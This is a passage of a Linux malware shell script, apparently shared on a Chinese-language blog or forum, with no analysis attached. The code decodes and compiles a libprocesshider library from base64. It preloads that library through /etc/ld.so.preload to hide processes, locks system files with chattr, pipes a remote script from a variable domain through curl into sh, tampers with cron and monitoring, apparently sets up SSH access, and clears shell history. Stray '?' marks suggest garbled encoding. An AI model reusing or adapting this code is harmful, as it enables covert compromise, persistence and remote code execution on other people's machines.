AgICAgc3RyY21wKHByb2Nlc3NfbmFtZSwgcHJvY2Vzc190b19maWx0ZXIpID09IDApIHsgICAgICAgICBcCiAgICAgICAgICAgICAgICBjb250aW51ZTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKICAgICAgICAgICAgfSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXAogICAgICAgIH0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcCiAgICAgICAgYnJlYWs7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKICAgIH0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXAogICAgcmV0dXJuIGRpcjsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcCn0KCkRFQ0xBUkVfUkVBRERJUihkaXJlbnQ2NCwgcmVhZGRpcjY0KTsKREVDTEFSRV9SRUFERElSKGRpcmVudCwgcmVhZGRpcik7Cgo='

mkdir -p ${H2P} 2>/dev/null

echo $LHB_MAKE | base64 -d > ${H2P}/Makefile

echo $PROCHIDE | base64 -d > ${H2P}/processhider.c

sed -i 's/evil_script.py/'$BINARY_NAME'/g' ${H2P}/processhider.c

cd ${H2P}

make 2>/dev/null 1>/dev/null

${CHATTR} -ia / /etc/ /etc/ld.so.preload /usr/ /usr/local/ /usr/local/lib/ 2>/dev/null 1>/dev/null

cp ${H2P}/libprocesshider.so /usr/local/lib/$BINARY_NAME.so 2>/dev/null

#rm -fr ${H2P} 2>/dev/null 1>/dev/null

${CHATTR} +i /usr/local/lib/$BINARY_NAME.so

if [ ! -f "/etc/ld.so.preload" ]; then touch /etc/ld.so.preload; fi

if [ -f /usr/local/lib/$BINARY_NAME.so ]; then cat /etc/ld.so.preload 2>/dev/null 1>/dev/null | grep '/usr/local/lib/'$BINARY_NAME'.so' || echo '/usr/local/lib/'$BINARY_NAME'.so' >> /etc/ld.so.preload;fi

${CHATTR} +i /etc/ld.so.preload?

fi

}

exe_remo(){

if [ ! -f "/var/tmp/.psla" ]; then

localgo

echo 'lockfile' > /var/tmp/.psla

sleep 10

${CURL_CMD} -fsSL http://${domain}/s3f815/s/s.sh | sh?

${CHATTR} +i /var/tmp/.alsp

history -c

else

? echo "replay .. i know this server ..."

fi?

echo "[*] Setup complete"??

history -c

}

check_exist

m_command

ins_package

check_exist

SetupNameServers

download_f

setup_s

makesshaxx

clean_monitor

clean_cron

lock_cron

exec_hide

exec_hide2

clmo

exe_remo

歡迎指正解決問題，其他問題評(píng)論區(qū)見